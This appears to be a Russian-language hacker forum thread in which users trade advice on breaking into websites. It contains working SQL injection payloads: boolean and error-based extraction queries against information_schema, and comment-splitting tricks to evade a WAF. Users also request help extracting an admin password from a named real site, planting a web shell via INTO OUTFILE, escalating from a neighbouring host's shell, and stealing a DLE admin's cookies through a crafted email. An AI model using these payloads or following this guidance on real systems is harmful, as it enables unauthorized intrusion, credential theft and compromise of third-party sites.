http://site.ru/announcements/123'+and+1=1+--+/ и по накатанной, а дальше если, что не так, иди к шайтану.
Парни, нашел уязвимость пытаюсь раскрутить ее через blind injection. Узнал версию, имя базы, но при обращении к ней выдает ошибку Invalid query: SELECT command denied to user 'xxxxxx'@'xxxxx' for table 'users' Значит, я никак не раскручу скулю или есть варианты?
скорее всего обращаешься к таблице users из базы mysql, а доступ к нему не всегда есть. ищи подходящие таблицы в текущей базе select table_name from information_schema.tables where table_schema=database()
Konqi, буду очень благодарен, если подскажете на примере, как осуществить. Вот мой запрос: CatID=2 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(database(), 1, 63), FLOOR(RAND(0)*2))) -- Ответ: Invalid query: Duplicate entry '5.1.311' for key 'group_key'
CatID=2 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 63), FLOOR(RAND(0)*2))) --
где можно найти инфу про то какие браузеры какие симолы урл энкодят? к примеру фф превращает ' в %27 а опера нет. где найти инфу об этом?
помогите админа вытащить http://www.grc.tomsk.ru/ GET vote%5B2%5D%5B%5D=7 - скуля почему то дальше имени бд не идет.
Привилегия File, Dba - False В sqlmap есть команда --sql-shell sql-shell> Что дальше ? Не пойму с командами , как понял select MiniShell into outfile "/dir/shell.php" Прошу помощи
Code: site.com/index.php?id=1+union+select+1,2,3+--+ Forbidden You don't have permission to access /index.php on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. Code: site.com/index.php?id=1+un/**/ion+se/**/lect+1,2,3+--+ [DATABASE ERROR:]1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'un/**/ion se/**/lect 1,2,3 --' at line 1 wtf?
Not WTF - WAF. 1) Перебор 2) Чтение конфигов, раз есть file_priv 3) Выбивание ошибок из скриптов 4) Гугление по варнингам\еррорам\нотисам для site:site.com
Конфиги, вы не поверите, веб-сервера, который обсуживает виртуальные хосты. То ли в уязвимостях, то ли в избранном есть топик со списками дефолтных путей к конфигам.
Ребят,посоветуйте в какую сторону копать,плз Ситуация такая: Жертва на DLE 9.x,админка доступна по адресу site.com/admin.php Есть шелл на соседе,с правами юзера соседа(попасть в папку "public_html" жертвы нет прав,нужны минимум права апача) Есть доступ к access логам жертвы.Судя по логам в админку он заходит редко,либо админит в основном через панель хостинга. В папке /tmp хранятся файлы сессий всех сайтов на сервере,но доступа к их содержимому нет(для входа в админку DLE нужно в куках передать переменную с пассом админа) Собственно,интересно узнать: 1)возможно ли повысить права до апача? или есть другие способы пробраться в папку сайта жертвы? 2)каким образом можно выудить куки админа? 3)другие возможные векторы атак Help me,guys,please
1) Uname: Linux 2.6.18-371.1.2.el5PAE #1 SMP Tue Oct 22 13:40:39 EDT 2013 i686 Рут маловероятен,интересно подняться до апача.Возможно ли это вообще? 2) С техникой эксплуатации ХСС мало знаком,но т.к. админ почти не заходит на сайт и версия ДЛЕ более-менее свежая(>9.5,паблик хсс под нее не встречал) - "кража" кук мне представляется невозможной Известна почта админа(которая находится на том же сервере,что и сайт) - возможно ли получить куки,отправив "специальное" письмо админу? 3) Smooth